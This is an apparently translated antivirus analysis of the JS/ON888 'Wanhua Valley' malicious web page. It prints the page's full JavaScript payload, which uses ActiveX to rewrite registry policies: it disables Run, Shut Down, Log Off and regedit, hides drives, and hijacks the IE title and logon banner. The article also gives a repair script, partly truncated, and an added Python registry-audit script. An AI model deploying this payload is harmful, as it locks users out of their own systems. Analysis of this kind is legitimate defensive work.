Wanhua Valley Web Page Virus Source Code Analysis

zhaozj, 2021-02-17

The anti-virus emergency response team of Beijing Jiangmin Company, a member of the National Anti-Virus Emergency Treatment Center, recently detected a website on the Chinese internet with the enticing name "Wanhua Valley" that is in fact a malicious trap. Anyone who gives in to the temptation and merely clicks it finds their computer immediately paralyzed; it is yet another malicious website that uses the latest Java technology to do damage. Beijing Jiangmin reminds users not to click on any website whose address contains on888.xxx, and to switch on KVW3000's real-time virus monitoring firewall so that it is blocked. Technical characteristics of the virus: JS/ON888 is a new kind of ActiveX web page containing harmful code, which damages a user's computer by way of a web address. Its destructive behaviour is as follows: (1) the user can no longer use Windows' DOS functionality (MS-DOS programs) normally; (2) the user cannot exit Windows properly; (3) the "Shut Down" and "Run" items on the Start menu are hidden, the user is prevented from starting in DOS mode, and the DOS command prompt and the regedit command are disabled; (4) a web address containing the harmful code is added to the IE home page and to Favorites.
Concretely: (a) the web address is www.on888.xxx.xxx.com; (b) a "Wanhua" shortcut is automatically added to IE's Favorites, pointing to "http://96xx.xxx.com". Below, the author gives an analysis of the virus code, followed by code that repairs the damage. The virus is named JS/XXXXX because it works through malicious JavaScript in the page. Let us see how the HTML page changes the IE title: the JavaScript first rewrites the Window Title value under HKLM\SOFTWARE\Microsoft\Internet Explorer\Main and HKCU\Software\Microsoft\Internet Explorer\Main, and then changes many other user settings: it removes the Run item, removes the Shut Down button, removes the Log Off button, hides the desktop, hides the drive letters, disables the Registry Editor, and so on.

The following is the code of this virus (restored from the garbled listing; comments translated):

```javascript
document.write("");  // the <applet> markup written here is blank in the listing as reproduced
function addfavlnk(loc, dispname, siteURL) {
    var shor = shl.CreateShortcut(loc + "\\" + dispname + ".url");
    shor.TargetPath = siteURL;
    shor.Save();
}
function f() {
    try {
        // ActiveX initialisation through the applet: WScript.Shell, Scripting.FileSystemObject, WScript.Network
        a1 = document.applets[0];
        a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
        a1.createInstance();
        shl = a1.GetObject();
        a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
        a1.createInstance();
        fso = a1.GetObject();
        a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
        a1.createInstance();
        net = a1.GetObject();
        try {
            if (document.cookie.indexOf("chg") == -1) {
                // shl.RegWrite("HKCU\\Internet Explorer\\Main\\Start Page", "http://com.6to23.com/");
                var expdate = new Date((new Date()).getTime() + (1));
                document.cookie = "chg=general; expires=" + expdate.toGMTString() + "; path=/;";
                shl.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun", 1, "REG_BINARY");      // remove the Run item
                shl.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoClose", 1, "REG_BINARY");    // remove the Shut Down button
                shl.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoLogoff", 1, "REG_BINARY");   // remove the Log Off button
                shl.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDrives", "63000000", "REG_DWORD");  // hide drives
                shl.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools", "00000001", "REG_DWORD");  // disable the Registry Editor
                shl.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\Disabled", "00000001", "REG_DWORD");
                shl.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\NoRealMode", "00000001", "REG_DWORD");
                shl.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeCaption", "Your computer has been http://www.cnhack.org/ optimization:)");
                shl.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeText", "Your computer has been http://www.cnhack.org/ optimization:)");  // set the logon banner
                shl.RegWrite("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "new title ★ http://com.6to23.com/ & http://www.cnhack.org/");
                shl.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "new title ★ http://com.6to23.com/ & http://www.cnhack.org/");  // set the IE title
                var expdate = new Date((new Date()).getTime() + (1));
                document.cookie = "chg=general; expires=" + expdate.toGMTString() + "; path=/;";
            }
        } catch (e) {}
    } catch (e) {}
}
function init() { setTimeout("f()", 1000); }
init();
```

The following repairs each of the corresponding key values with similar JavaScript code:

```javascript
document.write("");
function addfavlnk(loc, dispname, siteURL) {
    var shor = shl.CreateShortcut(loc + "\\" + dispname + ".url");
    shor.TargetPath = siteURL;
    shor.Save();
}
function f() {
    try {
        // ActiveX initialisation, identical to the virus
        a1 = document.applets[0];
        a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
        a1.createInstance();
        shl = a1.GetObject();
        a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
        a1.createInstance();
        fso = a1.GetObject();
        a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
        a1.createInstance();
        net = a1.GetObject();
        try {
            if (document.cookie.indexOf("chg") == -1) {
                // shl.RegWrite("HKCU\\Internet Explorer\\Main\\Start Page", "http://com.6to23.com/");
                var expdate = new Date((new Date()).getTime() + (1));
                document.cookie = "chg=general; expires=" + expdate.toGMTString() + "; path=/;";
                shl.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun", 0, "REG_BINARY");      // restore the Run item
                shl.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoClose", 0, "REG_BINARY");    // restore the Shut Down button
                shl.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoLogoff", 0, "REG_BINARY");   // restore the Log Off button
                shl.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDrives", "00000000", "REG_DWORD");  // unhide the drives
                shl.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools", "00000000", "REG_DWORD");  // re-enable the Registry Editor
                // re-enable the MS-DOS prompt and real mode; the listing as printed still wrote 00000001 here, which keeps the restriction
                shl.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\Disabled", "00000000", "REG_DWORD");
                shl.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\NoRealMode", "00000000", "REG_DWORD");
                shl.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeCaption", "");  // clear the logon banner
                // the listing is cut off here in the source; the closing braces and init() below mirror the virus listing
            }
        } catch (e) {}
    } catch (e) {}
}
function init() { setTimeout("f()", 1000); }
init();
```
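As an added example (not the article's code), the following Python script reads a `reg export` dump and flags the values the virus writes, reporting beside each the clean value the repair script above restores; the sample export is constructed, and the .reg subset parsed covers only the dword, hex and string forms used here.

```python
# Added example, not the article's code: read a `reg export` (.reg) dump and flag the policy,
# IE and Winlogon values the JS/ON888 page sets, alongside the clean value its repair script writes.
import re

_POL = r"hkey_current_user\software\microsoft\windows\currentversion\policies"
_LOGON = r"hkey_local_machine\software\microsoft\windows\currentversion\winlogon"
_IE = r"software\microsoft\internet explorer\main"
WATCH = {  # (key, value name) -> clean value; lower-cased so matching is case-insensitive
    (_POL + r"\explorer", "norun"): 0, (_POL + r"\explorer", "noclose"): 0,
    (_POL + r"\explorer", "nologoff"): 0, (_POL + r"\explorer", "nodrives"): 0,
    (_POL + r"\system", "disableregistrytools"): 0,
    (_POL + r"\winoldapp", "disabled"): 0, (_POL + r"\winoldapp", "norealmode"): 0,
    (_LOGON, "legalnoticecaption"): "", (_LOGON, "legalnoticetext"): "",
    ("hkey_current_user\\" + _IE, "window title"): "",
    ("hkey_local_machine\\" + _IE, "window title"): "",
}

def parse_reg_export(text):
    """Minimal .reg reader: [key] headers and "name"=dword:/hex:/"string" lines."""
    values, key = {}, None
    for line in (l.strip() for l in text.splitlines()):
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1].lower()
        elif key and (m := re.match(r'"((?:[^"\\]|\\.)*)"=(.*)$', line)):
            name, data = m.group(1).lower(), m.group(2)
            if data.startswith("dword:"):
                values[key, name] = int(data[6:], 16)
            elif data.startswith("hex:"):  # REG_BINARY: comma-separated bytes, little-endian
                values[key, name] = int.from_bytes(bytes.fromhex(data[4:].replace(",", "")), "little")
            elif len(data) >= 2 and data[0] == data[-1] == '"':
                values[key, name] = data[1:-1].replace('\\"', '"').replace("\\\\", "\\")
    return values

def audit(text):
    """Return [(key, name, current, clean)] for every watched value not at its clean setting."""
    found = parse_reg_export(text)
    return [(k, n, found[k, n], clean) for (k, n), clean in WATCH.items()
            if (k, n) in found and found[k, n] != clean]

# Constructed sample export imitating an infected profile (not captured from a real machine).
SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoRun"=hex:01
"NoClose"=hex:01
"NoLogoff"=hex:00
"NoDrives"=dword:63000000

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Window Title"="New Title"
"""
```

Running `audit(SAMPLE_EXPORT)` lists NoRun, NoClose, NoDrives and the HKCU Window Title; NoLogoff is already at its clean value and is not reported.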

Please credit the original address when reprinting: https://www.9cbs.com/read-29566.html
